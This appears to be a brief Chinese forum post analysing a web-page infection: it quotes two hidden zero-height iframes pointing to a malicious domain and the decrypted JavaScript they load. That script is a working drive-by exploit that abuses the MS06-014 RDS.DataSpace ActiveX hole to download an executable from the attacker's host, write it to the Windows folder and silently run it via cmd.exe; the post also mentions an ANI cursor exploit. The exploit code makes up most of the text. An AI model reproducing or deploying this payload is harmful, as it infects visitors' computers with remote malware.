<iframe src="http://cc.wzxqy.com/tt/index.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://cc.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>
第一个里面有http://cc.wzxqy.com/tt/1.gif
第二个里面的http://cc.wzxqy.com/wm/1.js经过解密得:
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try{dl='http://cc.wzxqy.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}
和上面的ani一样挂了http:\\cc.wzxqy.com/tt/mm.exe,最近的都是ani+ms06-014 |